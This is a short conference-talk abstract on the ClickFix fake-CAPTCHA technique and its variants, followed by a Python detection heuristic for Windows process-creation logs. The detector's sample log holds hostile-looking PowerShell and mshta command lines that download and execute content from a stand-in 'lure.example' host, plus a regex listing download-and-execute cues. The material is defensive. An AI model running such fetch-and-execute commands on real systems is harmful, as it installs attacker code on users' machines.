Meet the Fixers: How One Social Engineering Technique Spawned a Family and How to Catch It
Last year at LTDH I did a talk on ClickFix — the fake-CAPTCHA trick that gets users to paste malicious commands into the Run dialog. I thought I was done with the topic.
A year on, ClickFix has grown a family. FileFix moves the trick to File Explorer. ConsentFix (APT29) does it through OAuth and bypasses MFA and passkeys without ever touching the endpoint. CrashFix deliberately breaks your browser, then offers the fix. And a DPRK-nexus actor used a ClickFix-style fake job interview to compromise an Axios maintainer, putting 100M weekly npm downloads in the blast radius.
Part one: how the family grew up. Part two: how we catch them — SIEM queries, Conditional Access, browser hardening, the lot. Part three: why none of this stays solved, because custom ClickFix GPTs and AI-generated lures are about to make the next variant cheaper than the last.
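Because the Run dialog is hosted by explorer.exe, one SIEM-style heuristic for the ClickFix pattern described above is to flag script interpreters spawned directly by explorer.exe whose command line reaches out for remote content or hides its window. The block below is an added example written for this page, not material from the talk; the `parent=... image=... cmdline=...` log format and the `lure.example` command lines are constructed, and a real pipeline would take the same three fields from Sysmon or EDR process-creation events.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Interpreters a Run-dialog paste typically launches; the Run dialog itself lives in explorer.exe.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Cues that the pasted command fetches remote content, hides its window, or is encoded.
REMOTE_CUES = re.compile(
    r"https?://"
    r"|\b(irm|iwr|invoke-webrequest|invoke-restmethod|iex|invoke-expression|downloadstring|curl|certutil)\b"
    r"|\s-(w|windowstyle)\s+hidden"
    r"|\s-(e|enc|encodedcommand)\b",
    re.IGNORECASE,
)

@dataclass
class ProcEvent:
    parent: str   # full path of the parent image
    image: str    # full path of the created process
    cmdline: str  # command line as logged

def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]

def is_clickfix_like(ev: ProcEvent) -> bool:
    """explorer.exe -> interpreter with a remote-fetch / hidden-window cue in the command line."""
    if _basename(ev.parent) != "explorer.exe":
        return False
    if _basename(ev.image) not in INTERPRETERS:
        return False
    return REMOTE_CUES.search(ev.cmdline) is not None

_LINE = re.compile(r"^parent=(\S+) image=(\S+) cmdline=(.*)$")

def parse_event(line: str) -> Optional[ProcEvent]:
    """Parse one line of the constructed log format; returns None for lines that do not match."""
    m = _LINE.match(line.strip())
    return ProcEvent(*m.groups()) if m else None

def scan(lines: List[str]) -> List[ProcEvent]:
    """Return the events that match the Run-dialog paste heuristic."""
    return [ev for ev in map(parse_event, lines) if ev and is_clickfix_like(ev)]

# Constructed sample: two benign launches and two that fit the pattern.
SAMPLE_LOG = [
    r'parent=C:\Windows\explorer.exe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline=powershell -w hidden -c "irm http://lure.example/verify | iex"',
    r"parent=C:\Windows\explorer.exe image=C:\Windows\System32\cmd.exe cmdline=cmd /c dir",
    r'parent=C:\Windows\System32\cmd.exe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline=powershell -c "iwr https://intranet.example/report"',
    r"parent=C:\Windows\explorer.exe image=C:\Windows\System32\mshta.exe cmdline=mshta https://lure.example/x.hta",
]
```

The third sample shows why the parent check matters: the same download verb launched from an existing shell is ordinary admin activity, and only the explorer.exe parent ties the event to a Run-dialog paste.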